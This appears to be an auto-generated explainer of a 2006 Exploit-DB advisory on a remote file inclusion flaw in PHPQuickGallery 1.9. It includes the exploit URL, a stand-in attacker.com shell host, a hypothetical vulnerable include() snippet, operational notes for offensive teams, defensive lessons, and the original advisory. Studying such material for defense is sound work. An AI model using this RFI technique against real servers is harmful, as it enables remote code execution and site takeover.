By exploitdb papers bot•November 19, 2006•
papers
PHPQuickGallery 1.9 Remote File Inclusion Explained
PHPQuickGallery 1.9 Remote File Inclusion Explained
What this paper is
This paper, published in 2006, describes a "Remote File Inclusion" (RFI) vulnerability in PHPQuickGallery version 1.9. The author, Al7ejaz Hacker, demonstrates how an attacker can exploit this flaw to include and execute arbitrary files from a remote server, effectively taking control of the web application.
Simple technical breakdown
The vulnerability lies in how the gallery_top.inc.php file handles user-supplied input for the textFile parameter. Instead of sanitizing this input, the application directly uses it to include other PHP files. An attacker can provide a URL to a malicious PHP file hosted on their own server. When gallery_top.inc.php includes this remote file, the attacker's code is executed on the victim's server.
Complete code and payload walkthrough
The provided exploit is a URL. There is no separate code or payload presented in the original paper beyond the exploit URL itself.
Exploit URL:
http://localhost/phpquickgallery/gallery_top.inc.php?textFile=Attackerhttp://localhost/phpquickgallery/gallery_top.inc.php: This is the target script that contains the vulnerability.?textFile=: This indicates the start of query parameters.textFileis the vulnerable parameter.Attacker: This is the value provided to thetextFileparameter. In a real attack, this would be a URL pointing to a malicious PHP file on an attacker-controlled server (e.g.,http://attacker.com/shell.txt).
The paper implies that the gallery_top.inc.php script likely contains code similar to this (this is a hypothetical reconstruction based on the vulnerability description, not from the original paper):
<?php
// ... other code ...
$file_to_include = $_GET['textFile'];
include($file_to_include . '.php'); // Vulnerable line
// ... other code ...
?>In this hypothetical code:
$_GET['textFile']retrieves the value passed in thetextFileparameter from the URL.include($file_to_include . '.php');attempts to include a file. IftextFileisAttacker, it tries to includeAttacker.php. IftextFileishttp://attacker.com/shell.txt, it would attempt to includehttp://attacker.com/shell.txt.php. However, PHP'sincludefunction, when given a URL, will fetch and execute the content of that URL if theallow_url_fopendirective is enabled inphp.ini.
Mapping:
- Exploit URL Structure -> Practical Purpose: To trigger the inclusion of a remote file by manipulating the
textFileparameter. gallery_top.inc.php-> Practical Purpose: The vulnerable script that processes thetextFileparameter.textFileparameter -> Practical Purpose: The input vector for the Remote File Inclusion vulnerability.- Value of
textFile(e.g.,Attackeror a remote URL) -> Practical Purpose: The identifier for the file to be included, which can be controlled by the attacker.
Practical details for offensive operations teams
- Required Access Level: Network access to the target web server. No prior authentication to the web application is typically required for this type of vulnerability.
- Lab Preconditions:
- A vulnerable instance of PHPQuickGallery 1.9 deployed on a web server.
- A remote server controlled by the operator, capable of hosting a malicious PHP file.
- The target web server must have
allow_url_fopenenabled in itsphp.iniconfiguration. This is a critical prerequisite.
- Tooling Assumptions:
- A web browser for testing and initial reconnaissance.
- A simple HTTP server (e.g., Python's
http.server,netcat) to host the malicious payload. - A text editor to create the malicious PHP payload.
- Execution Pitfalls:
allow_url_fopendisabled: If this PHP directive is disabled on the target server, RFI will not work. The attacker would need to look for Local File Inclusion (LFI) vulnerabilities instead.- Input Sanitization/Filtering: If the web application or server-side code performs strict validation or filtering on the
textFileparameter (e.g., disallowing URLs, specific characters), the exploit might fail. - File Extension Mismatch: The original exploit example uses
Attacker. If the vulnerable script appends.php(e.g.,include($file_to_include . '.php');), the attacker might need to ensure their remote file has a.txtextension and the URL points to it directly, or craft the URL to bypass the.phpappend if possible. However, the most common RFI payloads are often disguised as.txtfiles to bypass basic WAFs or server configurations that might block.phpfrom remote sources. - Network Connectivity: The target server must be able to reach the attacker's hosting server. Firewalls or network segmentation could prevent this.
- Telemetry:
- Web Server Logs: Look for requests to
gallery_top.inc.phpwith unusualtextFileparameters, especially those containinghttp://orhttps://. - Remote Server Logs: Incoming HTTP requests to the attacker's hosting server from the target IP address.
- Application Behavior: Unexpected output, errors, or execution of commands on the target server.
- Web Server Logs: Look for requests to
Where this was used and when
This vulnerability was published in November 2006. PHPQuickGallery was a relatively popular, albeit simple, web gallery script at the time. Exploits like this were common in the mid-2000s as web application security practices were less mature. It would have been used against any server running PHPQuickGallery 1.9 where allow_url_fopen was enabled.
Defensive lessons for modern teams
- Input Validation is Paramount: Never trust user input. Always validate and sanitize all external data before using it in file operations or any other sensitive context.
- Disable
allow_url_fopen: For most modern PHP applications,allow_url_fopenis not necessary and poses a significant security risk. It should be disabled inphp.iniunless there's a very specific, well-understood use case. - Use Whitelisting: Instead of trying to block bad inputs, define a strict list of allowed inputs (e.g., a list of known, safe template files).
- Secure File Inclusion Practices: If file inclusion is necessary, use functions like
include()orrequire()with carefully controlled, hardcoded paths or paths derived from trusted sources, never directly from user input. - Web Application Firewalls (WAFs): While not a silver bullet, WAFs can help detect and block common RFI patterns. However, attackers can often bypass simple WAF rules.
- Regular Patching and Updates: Keep all web applications and their dependencies updated to the latest secure versions.
ASCII visual (if applicable)
+-----------------+ +---------------------+ +-------------------+
| Attacker Server | ----> | Target Web Server | ----> | PHPQuickGallery |
| (Hosts Payload) | | (Vulnerable Server) | | (gallery_top.inc.php)|
+-----------------+ +---------------------+ +-------------------+
^ |
| |
| HTTP Request (e.g., GET /shell.txt) | include()
| |
+-------------------------------------------------------+
|
| Executes
| Attacker's Code
v
+-------------------+
| Compromised Host |
+-------------------+Source references
- Paper URL: https://www.exploit-db.com/papers/2814
- Raw Exploit URL: https://www.exploit-db.com/raw/2814
- Exploit-DB Entry: PAPER ID: 2814
Original Exploit-DB Content (Verbatim)
============================================================================
+ =
+ PhpQuickGallery Remot File Include
+ =
+
+===========================================================================
+
+
+
+Script: phpquickgallery
+
+RisQe : Dangeureuse
+
+Type: Remot File Include
+
+File Infected : gallery_top.inc.php
+
+Credit By: Al7ejaz Hacker
+
+E-mail: saudi@hotmail.fr
+============================================================================
+
+
++++++++++++
+Exploit : +
++++++++++++
+
+http://localhost/phpquickgallery/gallery_top.inc.php?textFile=Attacker
+
+
+
+Discoverd By Al7ejaz Hacker
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# milw0rm.com [2006-11-19]